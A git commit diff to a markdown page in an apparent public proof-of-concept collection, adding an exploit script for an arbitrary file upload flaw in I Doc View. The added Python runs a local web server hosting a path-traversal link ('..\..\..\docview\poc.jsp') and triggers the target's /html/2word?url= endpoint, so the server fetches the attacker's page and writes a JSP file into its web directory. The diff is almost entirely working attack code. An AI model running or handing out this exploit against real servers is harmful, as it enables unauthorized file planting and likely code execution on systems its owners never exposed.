Update I Doc View任意文件上传漏洞.md

2025-02-27 04:39:25 +00:00 · 2024-05-26 20:03:37 +08:00 · 2024-05-26 20:03:37 +08:00 · 11cad5b5d8
commit 11cad5b5d8
parent 30c2d17904
1 changed files with 68 additions and 0 deletions
--- a/View任意文件上传漏洞.md
+++ b/View任意文件上传漏洞.md
@ -23,6 +23,74 @@ poc.html

 ![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)

+## 利用脚本
+```python
+import http.server
+import socketserver
+import sys
+import threading
+import requests
+
+visited_pages = {'/': False, '/..\..\..\docview\poc.jsp': False}
+
+class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
+    def do_GET(self):
+        global visited_pages
+        if self.path in visited_pages:
+            visited_pages[self.path] = True
+
+            if all(visited_pages.values()):
+                print("Success! Go to http://{}:{}/poc.jsp".format(remote_ip,remote_port))
+                threading.Thread(target=server.shutdown).start()
+
+        if self.path == '/':
+            self.send_response(200)
+            self.send_header("Content-type", "text/html")
+            self.end_headers()
+            html = f'''<html>
+<head><title>Index Page</title></head>
+<body>
+    <link href="http://{ip_address}:{port}/..\..\..\docview\poc.jsp">
+</body>
+</html>'''
+            self.wfile.write(html.encode('utf-8'))
+        elif self.path == '/..\..\..\docview\poc.jsp':
+            self.send_response(200)
+            self.send_header("Content-type", "text/html")
+            self.end_headers()
+            self.wfile.write(b"<html><body><h1>Poc Works!</h1></body></html>")
+        else:
+            self.send_error(404, "File not found")
+
+    def log_message(self, format, *args):
+        return
+
+def send_request_to_remote():
+    remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'
+    try:
+        response = requests.get(remote_url)
+    except Exception as e:
+        pass
+
+if len(sys.argv) < 5:
+    print("Usage: python script.py <IP_ADDRESS> <PORT> <REMOTE_IP> <REMOTE_PORT>")
+    sys.exit(1)
+
+ip_address = sys.argv[1]
+port = int(sys.argv[2])
+remote_ip = sys.argv[3]
+remote_port = sys.argv[4]
+
+def start_server():
+    global server
+    server = socketserver.TCPServer((ip_address, port), MyHttpRequestHandler)
+    server.serve_forever()
+
+server_thread = threading.Thread(target=start_server)
+server_thread.start()
+
+send_request_to_remote()
+```
 ## 漏洞分析
 ```
 https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg